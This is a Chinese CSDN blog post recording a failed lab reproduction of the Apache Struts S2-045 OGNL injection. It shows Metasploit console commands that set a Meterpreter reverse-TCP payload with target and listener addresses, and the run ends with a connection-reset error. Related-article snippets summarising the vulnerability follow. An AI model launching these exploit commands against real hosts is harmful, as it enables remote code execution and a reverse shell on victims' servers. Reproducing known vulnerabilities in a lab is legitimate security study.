Apache Struts Jakarta Multipart Parser OGNL Injection(Metasploit)复现失败

最新推荐文章于 2023-02-23 15:38:35 发布
最新推荐文章于 2023-02-23 15:38:35 发布
阅读量846 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cwtv123/article/details/77775112
版权

0x01:环境
PentestBox2.2
下载Exploit
https://www.exploit-db.com/exploits/31433/
加载到metasploit-framework.bak\modules\exploits\multi\http\struts

0x02:

msf exploit(41614) > use exploit/multi/http/struts/41614
msf exploit(41614) > set payload windows/meterpreter/reverse_tcp
msf exploit(41614) > show options
msf exploit(41614) > set rhost 10.160.11.192
msf exploit(41614) > set targeturi /struts2-5-showcase/
msf exploit(41614) > set lhost 10.160.14.122
msf exploit(41614) > show options
msf exploit(41614) > run
[*] Started reverse TCP handler on 10.160.14.122:4444
[-] Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
msf exploit(41614) >

执行失败?

四盘山
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Struts中利用OGNL注入
weixin_30480583的博客
03-21 3291
前言 本文简要介绍了Apache StrutsOGNL注入缺陷,文章中介绍使用简单的应用程序复现OGNL注入。深入研究针对公共漏洞,并理解这类漏洞。 内容 安装Apache Tomcat服务器(入门) 熟悉Java应用程序在服务器上的工作方式(Web服务器基础知识) Struts应用程序示例(Struts应用程序示例) 表达语言注入(表达式语言注入) 了解OGNL注射(对象图导航语言...
(最全)Apache Jakarta Commons 工具集及其API
05-29
网上找不全,官网资源又太分散,自己动手,丰衣足食,这是我挨个下载的Apache jakarta commons,有windows与linux两版本(全都有源码),甚至分离出去的HttpClient都在其中,愿更多的人了解并使用Apache,这是一个...
Apache Struts OGNL表达式注入漏洞
weixin_30693183的博客
06-07 1122
漏洞名称: Apache Struts OGNL表达式注入漏洞 CNNVD编号: CNNVD-201306-105 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等级: 漏洞类型: 威胁类型: 远程 CVE编号: CVE-2013-2135 ...
Maven Struts2
十年彩虹
09-10 615
org.apache.struts struts2-core ${struts.version} org.apache.struts struts2-json-plugin ${struts.version} org.apache.struts struts2-spring-plugin ${struts.version}
struts2安全插件struts2-secure-jakarta-multipart-parser-plugin引起的文件上传问题
weixin_30391339的博客
01-09 210
新项目的框架是ssh,用到了struts2的文件上传功能,但发现项目在eclipse启动后,只有第一次上传文件是ok的,以后上传就报 2018-01-09 21:32:16 [http-nio-8080-exec-7] ERROR: com.cs.lexiao.admin.basesystem.component.core.AttachmentServiceImpl#save : ...
struts2配置文件详解
loser
01-06 5088
这个文件是struts2框架的全局属性文件,也是自动加载的文件。该文件包含了系列的key-value对。该文件完全可以配置在struts.xml文件中,使用constant元素。下面是这个文件中一些常见的配置项及说明。         struts.configuration     该属性指定加载Struts 2配置文件的配置文件管理器。该属性的默认值是o
Apache Struts2(S2-045)漏洞升级指南
03-07
在**Apache Struts2** 的**Jakarta Multipart Parser** 插件中,当用户提交包含文件的表单时,插件会解析`Content-Type`字段来确定如何处理这些数据。如果攻击者能够篡改`Content-Type`字段并注入恶意的OGNL表达式,...
Apache Struts(MVC 框架) v2.5.10
04-22
Apache Struts(MVC 框架)简介StrutsApache软件基金会(ASF)赞助的一个开源项目。它最初是 Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用 Java Servlet/JSP 技术,实现了基于Java EE ...
apache-jakarta旗下的所有开源项目jar文件
03-06
apache-jakarta旗下的所有开源项目jar文件 apache-jakarta-commons-codec.jar apache-jakarta-commons-collections.jar apache-jakarta-commons-discovery.jar apache-jakarta-commons-email.jar apache-jakarta-...
apache struts2
09-13
apache struts2, what's the spring, and how do we use it
struts2-OGNL表达式测试
09-28
struts2-OGNL表达式测试代码
Apache Struts2 S2-045远程命令执行漏洞(CVE-2017-5638)复现
最新发布
qq_40640917的博客
02-23 2343
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
Anprou的博客
03-07 1721
上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。 简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框
漏洞复现Struts2系列漏洞复现总结
weixin_42282189的博客
11-03 2316
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 Struts2-045(CVE-2017-5683) 0x01 漏洞描述 Apache Struts 2最初被称为WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用程序。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。 Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartR.
Apache Struts2 远程代码执行漏洞(S2-045)技术分析与防护方案
热门推荐
xiao190128的专栏
03-10 1万+
Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,漏洞编号为CNNVD-201703-152。攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。 相关链接如下: https://cwiki.apache.org/confluence/display/WW/S2-045?
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
Coisini的博客
05-27 523
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法 近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞。 漏洞编号: S2-045,CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述: Apache St...
struts2漏洞_有没有兴趣研究Remote Code Execution漏洞利用?
weixin_39899244的博客
12-10 415
本期文档内容为:《S2-045 Remote Code Execution漏洞利用》作者介绍:Fhawkz福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的帮助。0x00漏洞背景Struts2是第二代基于Model-View-Controller(MVC)模型的java...
Struts2 S2-045漏洞分析:远程代码执行与Jakarta Multipart解析
Struts S2-045漏洞是一个影响Apache Struts2框架的严重安全问题,它出现在使用Jakarta Multipart解析器进行文件上传时。官方公告指出,恶意的Content-Type值可能导致远程代码执行。当Content-Type头无效时,会引发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值